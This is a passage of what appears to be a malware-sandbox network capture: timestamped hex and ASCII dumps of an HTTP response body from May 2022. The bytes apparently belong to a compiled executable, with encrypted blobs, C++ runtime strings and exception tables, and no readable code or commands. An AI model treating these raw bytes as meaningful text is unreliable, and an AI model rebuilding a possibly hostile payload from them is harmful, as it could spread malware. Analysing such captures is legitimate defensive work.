                                                                                                                                                                                    2022-05-23 16:54:51 UTC1408INData Raw: 17 fe b6 57 b4 a1 70 cb ee ce 71 db fc 3b b9 7f fd fb 07 0d 6b d1 cb b4 5c de 27 19 93 40 62 63 4d 98 20 7b 1a 5b 8a 0f 83 fd 6b 19 03 00 0b 76 07 25 f7 37 4a 5b 19 63 95 8b be 03 3d ca 8f 82 07 bd ce 88 f3 ba c3 40 3f 07 ae df de c3 3c b7 e1 20 61 63 53 3f d3 69 9f b4 7c 16 bf 61 bb fb 46 4f 44 df 01 e8 c1 9b 50 17 47 0e df 5e fb f8 ef 8a 8b e9 13 45 2e 82 2a b7 ff 17 4a 8a 25 57 4b 56 cc 49 db ec f7 aa ab 31 62 cb 3b 58 7d 44 dc 8f 23 0f 2d ab 83 a5 b3 69 7f fc 4f 8a cb bd db 06 79 0c 7d 9e b8 e3 16 03 ca 3f 57 76 c7 09 0f 11 38 7a 20 e9 93 42 d2 93 fd 44 58 d3 ba 12 ad 1f 3b da 1c 11 73 5c 8b 21 57 ed 13 50 d2 83 c1 a7 df 63 8e d3 9e 6f 77 5e 67 fe 83 2c d4 76 57 bd 17 37 6a 5b 29 93 15 bb 6e 8b 85 62 bf 62 5f ad 76 20 4b 22 d3 60 2f ff 26 cf 76 23 a4
                                                                                                                                                                                    Data Ascii: Wpq;k\'@bcM {[kv%7J[c=@?< acS?i|aFODPG^E.*J%WKVI1b;X}D#-iOy}?Wv8z BDX;s\!WPcow^g,vW7j[)nbb_v K"`/&v#
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1424INData Raw: 01 29 a1 69 68 d8 97 6b 43 c5 11 c9 53 93 0d e3 d1 9f df 6f fa 5c 25 1f 73 4e 2f 7d 47 05 ae ba ab 71 db bf 2d 57 ad 54 d8 d3 3a e3 42 bb cb 0e cc 69 db 34 6e 32 9b 16 76 a1 f3 87 f5 87 55 53 26 4b e8 eb 73 0e c8 f9 63 bc 7f 12 4b f9 eb 63 a6 ef 5e bb e8 97 82 28 c9 8f 93 1b 2b 11 c7 cc c7 22 7b f8 a7 df 36 cf d4 ab f8 d7 c6 06 cd 27 d3 97 2f 35 2b d9 fb 26 1b 50 3b eb de b2 41 eb bc c6 9a bb c1 56 57 82 e4 0d 36 a8 e8 65 d3 a6 07 47 ee a7 6d ef 74 3c 87 e3 42 bf 77 06 ef 1a 87 54 d6 46 07 39 1b c8 02 93 95 58 4b b7 ac d3 e0 8f bf de 48 56 ad cd f7 4a 03 52 6f 57 9e 3f e5 cf 0c b4 62 b7 81 50 57 a2 27 0c cf cc 37 49 cb 09 d8 92 66 74 79 fb b4 47 e2 26 6d e3 c3 b7 c7 d5 67 75 53 be 33 09 3b cb de e8 c9 73 3c f7 12 8b 61 fb db a6 cf 7e e3 00 6f 9a 23 09 f8
                                                                                                                                                                                    Data Ascii: )ihkCSo\%sN/}Gq-WT:Bi4n2vUS&KscKc^(+"{6'/5+&P;AVW6eGmt<BwTF9XKHVJRoW?bPW'7IftyG&mguS3;s<a~o#
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1440INData Raw: ea 4b ae d7 22 8b 81 50 5f a2 8f 0d cf cc 37 c1 8f 65 d3 53 2e 1f be 56 2c c0 ac ab d0 63 03 19 c1 d5 20 7f 1f 9a ab 09 73 40 12 0b cd 57 cc f7 99 c7 45 df 50 26 4b 5a 61 24 dc 5b 1e f3 0d 53 2e 00 da de 1c e7 9a 7b 62 5f df 16 97 c5 af b4 9c 26 af 59 db 1b 46 1c 6c 9f cb 69 9a 92 d9 13 dc 80 87 a3 f3 94 d4 f6 8f 59 53 1b 0e 47 d6 eb 50 cf 4a bb d9 c8 72 7e 08 e3 ff 65 1f 42 e4 ef fb 40 f2 63 11 b7 47 f3 16 b3 d9 db 43 6e 1a ea ef fc 5e ce 27 11 93 40 aa 63 fd 67 74 5f a9 93 d1 64 cd 3e 9e 91 eb ec b1 a8 83 62 bf df 06 97 d5 2f 97 47 42 8c 77 43 42 e2 3b d5 c4 a0 f3 8a 88 bc 5e 6b 2d 13 79 af 54 5f 22 4b ea ef 3f 36 97 4d cf 77 7e 4a 34 ff bb 70 c6 6b 5a f9 fc 3c 8b a6 d9 43 63 3e e1 dd b0 98 5b aa 89 e9 fb db 46 f4 51 db f4 17 02 03 e2 cb bb b1 41 c5 fc
                                                                                                                                                                                    Data Ascii: K"P_7eS.V,c s@WEP&KZa$[S.{b_&YFliYSGPJr~eB@cGCn^'@cgt_d>b/GBwCB;^k-yT_"K?6Mw~J4pkZ<Cc>[FQA
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1456INData Raw: 8b c9 3b a8 2a b3 6d 2e 54 5f dd 57 45 0b 53 3d 13 69 d7 fd f7 9a d3 38 53 f3 ce 23 d1 1e fc 17 4a d3 52 d7 47 16 96 d5 77 94 f6 ce af 99 ba 63 0f 7f d5 ff 3c 9a 96 27 80 73 73 1e 0f 4e 73 40 c7 ab ab d9 14 bf e2 d7 7d 4c 60 e3 b2 4a 09 eb cb 5a 7d 05 74 78 6b a2 22 c9 fb b3 0f 03 59 bf fc c7 22 0f ca f7 57 16 2e 6d 2f a4 4c a6 8f c9 da cb 96 ff 3e 43 38 c7 8b 9b e9 c4 8f b2 3f 5d 57 64 4c 6a 5b f2 d7 ff 9e a6 f5 ef 20 28 12 91 61 3b 53 e5 2d 4e 87 0c 9c 36 bf 99 db fb a6 df d6 13 74 f7 6e ab c9 a3 7a 82 bf e5 ff 74 ac fe 57 25 af 17 e2 4b 39 83 55 93 26 6b a1 62 27 62 1f 35 ce 18 5b 1a 03 78 07 db a6 a7 d5 b7 47 e2 69 47 09 db 93 a5 63 7d a6 48 e3 8a 33 71 eb 3d 9a a3 fd ef dc f7 da c3 ca 87 df 5e 2f 35 67 1c f6 46 07 71 7a 53 97 3f d5 cf b4 4a 0e 9f 29
                                                                                                                                                                                    Data Ascii: ;*m.T_WES=i8S#JRGwc<'ssNs@}L`JZ}txk"Y"W.m/L>C8?]WdLj[ (a;S-N6tnztW%K9U&kb'b5[xGiGc}H3q=^/5gFqzS?J)
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1472INData Raw: 47 f0 ca bc 73 12 4b 11 c0 27 5b 58 9d 7c 08 c7 97 68 c5 17 17 5a 6b 75 7a 84 44 ce 13 39 60 11 56 0a d0 b7 d4 f7 8a 63 fa 3c 06 69 67 b6 a3 74 22 c1 ef 9d f7 27 5a 7f 80 87 7f 2b ba f3 02 31 53 2d ca d5 27 32 2b 67 64 29 c0 a7 b6 fa ae 23 b8 1b 46 67 05 37 9f 3e f2 ad c4 f0 7f 4a a8 ab 1b c8 cb b7 e4 57 fc 1f f1 a7 24 34 d3 25 83 f5 b2 0f 3b 86 87 15 27 33 6b 77 66 23 64 9f a9 61 81 50 56 26 0f 0d cf 24 44 76 fe be 1b d0 ea 3f 68 1c 00 a3 66 67 25 ab 9e fe 44 39 0f b4 5c 70 e3 82 76 fb 7e 11 71 aa 33 bf 91 4f 41 a6 18 6a 4b 39 ab e8 3b 56 ef 49 26 1b ad e3 7d 3f 97 0d d2 b8 a4 bb 13 f8 a8 38 50 b4 94 6e ab 84 18 d7 8a 5b 29 8b a8 a3 56 eb 04 b3 f0 6a a7 9d 64 36 17 f9 e6 89 1b 98 cf 07 b5 4d 36 b2 b5 f3 5a 87 db fb 64 29 33 20 5b ea 1e a1 78 27 86 0f be
                                                                                                                                                                                    Data Ascii: GsK'[X|hZkuzD9`Vc<igt"'Z+1S-'2+gd)#Fg7>JW$4%;'3kwf#daPV&$Dv?hfg%D9\pv~q3OAjK9;VI&}?8Pn[)Vjd6M6Zd)3 [x'
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1488INData Raw: 9a 33 e9 d6 fb 96 97 d4 af fc 17 b3 8b d9 db 3a 46 97 e5 76 64 6f 9a ea 51 fb 73 e7 87 d5 ef 5d 5f 72 ab 18 53 1b 0e 0e 5c 67 74 ce 4b bb d9 42 f9 a6 a7 e4 fc ec 97 ab 4f e9 fb ca a0 47 35 fe c4 7f 32 32 d5 db 43 87 3f f5 ef fd cf 8a 03 30 fb cb 2e 46 4d 67 74 5e 62 13 09 ca ab 3e a7 bc a1 af a8 d7 bb 85 5e 8f e3 b7 b1 56 72 a6 f7 4a 12 63 a9 cf 6b d5 2b b9 b9 cd ff a1 00 03 d2 e5 38 4a 54 5f 22 03 61 63 1b b6 97 4d cf fc f7 9a 9b f9 bb fb 46 a7 f5 fe fc 17 4a 9a d9 53 63 3c 97 d5 77 de 7f 8a 8b ea fb db 0e 7c d5 ff 74 13 02 03 61 77 73 1e 47 c0 ff 64 f7 af ab d9 eb ed c6 a7 35 c9 dc c7 aa 4c 09 eb cb 29 3f 4d ff f4 4f 8a 23 c1 fb fb 86 8e 7d 17 fc ce 22 4b 41 79 73 0e 2f 67 2f ec c7 39 ab e9 db c0 96 b7 b5 c3 1c f7 8a 97 e9 3b 1b 9b 97 5d 57 69 c7 aa 13
                                                                                                                                                                                    Data Ascii: 3:FvdoQs]_rS\gtKBOG522C?0.FMgt^b>^VrJck+8JT_"acMFJSc<w|tawsGd5L)?MO#}"KAys/g/9;]Wi
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1504INData Raw: 24 a7 35 97 da c3 aa f3 a3 ef cb 4c 3f 4d ff d4 8e 20 27 c9 40 66 82 87 7f 19 bc d3 26 4b 41 72 61 0f 2f 7f 4d ec c7 33 b3 eb db d3 e4 a3 c5 d6 3b f6 8a 83 2b 3b 1b ce 91 59 57 88 6d ae 13 9b 53 db 86 8f 18 71 50 2f c9 3a 65 3b 53 0e 2f 7c 54 45 17 a9 b9 71 db e2 be 96 e5 c7 3e f7 4a 09 db ef fb 56 ec e1 ff 4c 1e a5 9f e9 7e 70 2a 87 d9 64 d8 d7 00 73 e9 e9 56 ed 0b 7d 45 55 ff b2 5f fd eb 65 a6 a7 5c fd ce 27 ca b2 06 da db 99 c5 35 2f 6e d5 26 33 dd 7f ff 1e 9e 50 ee dc fa e8 8b 41 a1 e9 92 2f 99 f3 50 7f 1b 01 50 3b f8 34 3f d5 97 fa c3 9a d3 22 df 1b ec 87 e5 cf 34 66 31 9f 61 34 c8 92 a7 6f e1 54 c3 8e ab cf fb 53 1a a5 6c 45 1c 5f 03 33 43 53 53 47 a4 e5 4e d7 f5 aa 82 d8 d8 9b 7a 42 d1 ef 44 f7 4a 4b d8 f8 72 3e 2c 07 cf 44 ce 08 8f c9 c3 da a9 0f
                                                                                                                                                                                    Data Ascii: $5L?M '@f&KAra/M3;+;YWmSqP/:e;S/|TEq>JVL~p*dsV}EU_e\'5/n&3PA/PP;4?"4f1a4oTSlE_3CSSGNzBDJKr>,D
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1520INData Raw: 4c 98 9b 01 1f 61 96 cf fe eb 74 b7 d6 a9 c9 fc 0c 7c a7 61 de 18 5f 12 7c 43 53 02 19 b5 e5 33 69 f3 aa cb 86 c9 9b 2e 18 d7 ef bc 64 4e 4b 49 b4 71 3e 1a 85 cd 44 27 be 8f c9 bb bb 84 0f c0 af ce 7f 62 90 45 53 83 4e 1d 35 9a ad 6d aa 8b 7a ef cb e6 a6 d7 2f 9b b5 98 ab bd ac cf 96 5f 2f 55 cc 05 70 89 61 43 48 a2 87 f5 04 26 f7 a1 40 0b 73 2b bd 0b 5d 37 7f e5 9a 92 8c d9 fb 12 3b c1 af 4c 72 a8 8b 1b a9 19 46 f7 49 43 64 bf e8 a9 51 84 00 84 87 1d 45 d8 5f f2 d8 db 53 4d 7b 0d 5d 2b d8 4b 4a db ac 41 fb 36 d2 e7 ff f0 01 ae 4b 79 8e c9 a6 fd 40 fd cc ff a1 37 d9 1b 36 84 2f 3a 99 fe d7 12 af 35 db 1b 58 45 7d 77 03 5d 22 63 9a cf cb 2e d0 d7 cf c5 b8 b8 cb 9d 97 ff 86 87 aa 2d 1c 8b e5 21 71 eb 6c a2 1f a5 38 de d7 4e f4 cb 73 4f 0e 93 5d 3f d5 5d 22
                                                                                                                                                                                    Data Ascii: Lat|a_|CS3i.dNKIq>D'bESN5mz/_/UpaCH&@s+]7;LrFICdQE_SM{]+KJA6Ky@76/:5XE}w]"c.-!ql8NsO]?]"
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1536INData Raw: ef 94 df 9c 77 84 77 ac ff 4c 57 ac df 84 f0 c4 d0 dc d0 c4 b8 54 68 d4 58 54 58 6c 68 34 38 2c b8 34 78 0c 58 e4 b8 3c 68 9c c0 84 68 e4 e0 cc d0 d4 78 fc 78 e4 f0 14 58 e4 d0 3c f0 0c d0 04 d0 0c b8 ac 68 1c 58 8c 58 a4 68 8c 38 64 b9 6c 79 44 59 9c b9 74 69 c4 c1 cc 69 5c e1 04 d1 0c 79 34 79 40 b8 bc 60 80 e9 80 c8 90 db a8 db b0 b3 00 63 80 53 e0 53 d8 63 e0 33 f8 b3 c0 73 f8 53 30 b3 e8 63 28 cb 30 63 b0 eb 98 db a0 73 88 73 b0 fb 40 53 50 dc 88 fc d8 dc d0 dc f8 b4 58 64 c8 54 58 54 10 64 38 34 30 b4 38 74 30 54 e8 b4 20 64 90 cc 78 64 e8 ec d0 dc d8 74 c0 74 e8 fc 08 54 e8 dc 40 fc 00 dc 18 dc 00 b4 90 64 10 54 90 54 a8 64 70 35 68 b5 70 75 48 55 a0 b5 78 65 d8 cd c0 65 20 ed 08 dd 10 75 38 75 20 fd d0 55 20 dd f8 fd 48 dd 40 dd 48 b5 e8 65 58 55
                                                                                                                                                                                    Data Ascii: wwLWThXTXlh48,4xX<hhxxX<hXXh8dlyDYtii\y4y@`cSSc3sS0c(0css@SPXdTXTd8408t0T dxdttT@dTTdp5hpuHUxee u8u U H@HeXU
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1552INData Raw: 6d 70 62 69 69 69 77 79 61 71 66 75 61 73 6b 68 6e 78 71 69 79 6a 6c 6d 78 72 73 78 65 75 76 6f 6d 7a 68 75 6f 74 63 7a 79 6c 7a 7a 7a 77 68 73 70 62 61 66 69 66 62 64 6f 6c 79 75 78 68 76 6a 6d 6d 61 00 64 6e 73 70 67 65 6f 79 6d 67 62 61 78 6f 7a 79 7a 6d 74 61 6a 6a 6d 70 73 7a 61 61 6d 6e 68 69 78 75 6c 74 75 6d 7a 75 69 61 7a 79 6d 77 76 61 67 75 6b 65 76 6e 62 69 77 61 71 72 70 6d 62 6d 69 74 78 73 70 78 6b 76 61 6d 75 7a 73 76 75 6b 71 67 66 68 69 79 6a 72 6e 68 00 77 75 61 63 6f 6b 71 6f 6e 64 6c 6a 76 71 64 6f 6a 6b 77 6d 78 6c 6c 66 64 6b 6f 6e 75 6b 77 75 6e 67 62 75 69 6d 74 73 61 70 71 65 75 69 61 65 7a 68 79 7a 69 74 77 74 6a 6f 75 68 73 64 63 6c 65 74 79 6b 76 74 72 61 6f 6d 6b 00 63 72 6e 6c 72 65 66 6a 79 71 77 6b 69 64 63 00 76 67 78 70
                                                                                                                                                                                    Data Ascii: mpbiiiwyaqfuaskhnxqiyjlmxrsxeuvomzhuotczylzzzwhspbafifbdolyuxhvjmmadnspgeoymgbaxozyzmtajjmpszaamnhixultumzuiazymwvagukevnbiwaqrpmbmitxspxkvamuzsvukqgfhiyjrnhwuacokqondljvqdojkwmxllfdkonukwungbuimtsapqeuiaezhyzitwtjouhsdcletykvtraomkcrnlrefjyqwkidcvgxp
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1568INData Raw: 18 42 00 90 17 42 00 51 17 42 00 e3 17 42 00 51 17 42 00 20 17 42 00 51 17 42 00 e0 16 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00 51 17 42 00
                                                                                                                                                                                    Data Ascii: BBQBBQB BQBBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQBQB
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1584INData Raw: 61 74 6f 72 49 77 53 74 31 31 63 68 61 72 5f 74 72 61 69 74 73 49 77 45 45 45 00 00 00 00 00 53 74 39 74 69 6d 65 5f 62 61 73 65 00 00 00 00 53 74 39 74 79 70 65 5f 69 6e 66 6f 00 00 00 00 d8 e0 58 00 88 a1 58 00 9c a1 58 00 b0 a1 58 00 c4 a1 58 00 00 e1 58 00 ec e0 58 00 14 e1 58 00 28 e1 58 00 3c e1 58 00 50 e1 58 00 0c e4 58 00 d8 a1 58 00 14 a2 58 00 28 a2 58 00 3c a2 58 00 50 a2 58 00 00 a2 58 00 ec a1 58 00 34 e4 58 00 20 e4 58 00 48 e4 58 00 8c a2 58 00 64 a2 58 00 78 a2 58 00 c8 a2 58 00 dc a2 58 00 b4 a2 58 00 a0 a2 58 00 70 e4 58 00 5c e4 58 00 84 e4 58 00 98 e4 58 00 ac e4 58 00 c0 e4 58 00 e8 e4 58 00 f0 a2 58 00 04 a3 58 00 fc e4 58 00 10 e5 58 00 18 a3 58 00 2c a3 58 00 24 e5 58 00 38 e5 58 00 40 a3 58 00 54 a3 58 00 68 a3 58 00 7c a3 58 00
                                                                                                                                                                                    Data Ascii: atorIwSt11char_traitsIwEEESt9time_baseSt9type_infoXXXXXXXX(X<XPXXXX(X<XPXXX4X XHXXdXxXXXXXpX\XXXXXXXXXXX,X$X8X@XTXhX|X
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1600INData Raw: 30 72 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 45 0b 6c 0a 0e 0c 41 c3 0e 08 41 c6 0e 04 43 0b 00 00 28 00 00 00 18 02 00 00 c8 90 f0 ff 42 00 00 00 00 41 0e 08 83 02 43 0e 20 5a 0a 0e 08 41 c3 0e 04 41 0b 60 0e 08 41 c3 0e 04 00 00 40 00 00 00 a8 01 00 00 5c 79 f0 ff 9f 01 00 00 04 f0 45 4b 00 41 0e 08 85 02 41 0e 0c 87 03 46 0e 10 86 04 41 0e 14 83 05 45 0e 40 03 58 01 0a 0e 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 46 0b 10 00 00 00 88 02 00 00 28 8b ea ff 36 00 00 00 00 00 00 00 50 00 00 00 00 02 00 00 54 74 f0 ff 0b 04 00 00 04 0c 46 4b 00 41 0e 08 85 02 41 0e 0c 87 03 41 0e 10 86 04 41 0e 14 83 05 43 0e 40 02 b7 0e 3c 4a 0e 40 02 ab 0a 0e 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 49 0b 03 7f 01 0e 3c 4a 0e 40 00 00 34 00 00 00 f0 02 00 00
                                                                                                                                                                                    Data Ascii: 0rAAElAAC(BAC ZAA`A@\yEKAAFAE@XAAAAF(6PTtFKAAAAC@<J@AAAAI<J@4
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1616INData Raw: 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 d8 06 ea ff 75 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 2c 00 00 00 24 00 00 00 64 57 ee ff 48 00 00 00 04 e8 4a 4b 00 41 0e 08 86 02 41 0e 0c 83 03 45 0e 20 78 0e 0c 43 c3 0e 08 41 c6 0e 04 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 3c e8 ef ff 9a 01 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 70 e6 ef ff 9a 01 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 b4 e9 ef ff
                                                                                                                                                                                    Data Ascii: zR|uzPLR|PJ,$dWHJKAAE xCAzR|<zR|pzR|
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1632INData Raw: 00 00 00 00 41 0e 08 83 02 45 0e 30 5a 0e 28 43 0e 30 45 0e 08 41 c3 0e 04 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 24 00 00 00 1c 00 00 00 44 b8 e9 ff 2c 00 00 00 00 41 0e 08 83 02 45 0e 30 5a 0e 28 43 0e 30 45 0e 08 41 c3 0e 04 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 24 00 00 00 1c 00 00 00 b4 b9 e9 ff 2c 00 00 00 00 41 0e 08 83 02 45 0e 30 5a 0e 28 43 0e 30 45 0e 08 41 c3 0e 04 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 24 00 00 00 1c 00 00 00 e4 ba e9 ff 2c 00 00 00 00 41 0e 08 83 02 45 0e 30 5a 0e 28 43 0e 30 45 0e 08 41 c3 0e 04 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 24 00 00 00 1c 00 00 00 24 bb e9 ff
                                                                                                                                                                                    Data Ascii: AE0Z(C0EAzR|$D,AE0Z(C0EAzR|$,AE0Z(C0EAzR|$,AE0Z(C0EAzR|$$
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1648INData Raw: 41 c6 0e 08 41 c7 0e 04 47 0b 5d 0e 1c 43 0e 30 43 0e 10 41 c3 0e 0c 41 c6 0e 08 41 c7 0e 04 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 2c 00 00 00 1c 00 00 00 20 3d ec ff 88 01 00 00 00 41 0e 08 85 02 42 0d 05 46 87 03 86 04 83 05 02 52 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 2c 00 00 00 1c 00 00 00 d8 29 ec ff 01 02 00 00 00 41 0e 08 85 02 42 0d 05 49 87 03 86 04 83 05 02 e8 0a c3 41 c6 41 c7 41 c5 0c 04 04 49 0b 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 1c 00 00 00 1c 00 00 00 00 3f ec ff 39 00 00 00 00 43 0e 30 6d 0e 1c 43 0e 30 43 0e 04 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00
                                                                                                                                                                                    Data Ascii: AAG]C0CAAAzR|, =ABFRAAACzR|,)ABIAAAIzR|?9C0mC0CzR|
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1664INData Raw: 00 00 00 ec b7 e9 ff 07 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 b0 b7 e9 ff 07 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 a4 1d f0 ff 0b 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 38 21 f0 ff 0b 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 1c e6 e9 ff 08 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 00 e6 e9 ff 08 00 00 00 00 00 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04
                                                                                                                                                                                    Data Ascii: zR|zR|zR|8!zR|zR|zR|
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1680INData Raw: 08 41 c5 0e 04 4b 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 38 00 00 00 1c 00 00 00 78 8a ef ff 70 00 00 00 00 41 0e 08 87 02 41 0e 0c 86 03 44 0e 10 83 04 6b 0a c3 0e 0c 41 c6 0e 08 41 c7 0e 04 4d 0b 6b c3 0e 0c 41 c6 0e 08 41 c7 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 38 00 00 00 1c 00 00 00 64 86 ef ff 70 00 00 00 00 41 0e 08 87 02 41 0e 0c 86 03 44 0e 10 83 04 6b 0a c3 0e 0c 41 c6 0e 08 41 c7 0e 04 4d 0b 6b c3 0e 0c 41 c6 0e 08 41 c7 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 14 00 00 00 1c 00 00 00 50 8d ef ff 19 00 00 00 00 4c 0e 20 4b 0e 04 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 14 00 00 00 1c 00 00 00
                                                                                                                                                                                    Data Ascii: AKzR|8xpAADkAAMkAAzR|8dpAADkAAMkAAzR|PL KzR|
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1696INData Raw: 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 43 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 38 00 00 00 1c 00 00 00 1c 62 ef ff 61 00 00 00 00 41 0e 08 87 02 41 0e 0c 86 03 43 0e 10 83 04 43 0e 20 71 0e 10 43 0e 20 43 0a 0e 10 41 c3 0e 0c 41 c6 0e 08 41 c7 0e 04 43 0b 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 40 00 00 00 1c 00 00 00 c8 6c ef ff 6d 00 00 00 00 41 0e 08 85 02 41 0e 0c 87 03 43 0e 10 86 04 41 0e 14 83 05 43 0e 30 7b 0e 20 43 0e 30 43 0a 0e 14 41 c3 0e 10 41 c6 0e 0c 41 c7 0e 08 41 c5 0e 04 43 0b 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 3c 00 00 00 1c 00 00 00 7c 67 ef ff 6c 00 00 00 00 41 0e 08 85 02 41 0e 0c 87 03 41 0e 10 86 04 41 0e 14 83
                                                                                                                                                                                    Data Ascii: AAAACzR|8baAACC qC CAAACzR|@lmAACAC0{ C0CAAAACzR|<|glAAAA
                                                                                                                                                                                    2022-05-23 16:54:51 UTC1712INData Raw: 20 43 0e 04 00 00 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 40 00 00 00 24 00 00 00 b0 e1 ed ff 9e 01 00 00 04 50 69 4b 00 41 0e 08 85 02 42 0d 05 43 87 03 86 04 83 05 02 be 0a c3 41 c6 41 c7 41 c5 0c 04 04 49 0b 02 4f 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 00 14 00 00 00 00 00 00 00 01 7a 52 00 01 7c 08 01 1b 0c 04 04 88 01 00 00 10 00 00 00 1c 00 00 00 94 ef ed ff 05 00 00 00 00 00 00 00 1c 00 00 00 00 00 00 00 01 7a 50 4c 52 00 01 7c 08 07 00 50 fd 4a 00 00 1b 0c 04 04 88 01 00 00 40 00 00 00 24 00 00 00 30 dc ed ff 9e 01 00 00 04 a0 69 4b 00 41 0e 08 85 02 42 0d 05 43 87 03 86 04 83 05 02 c7 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 02 4c 0a c3 41 c6 41 c7 41 c5 0c 04 04 43 0b 00 00 14 00 00 00
                                                                                                                                                                                    Data Ascii: CzPLR|PJ@$PiKABCAAAIOAAACzR|zPLR|PJ@$0iKABCAAACLAAAC
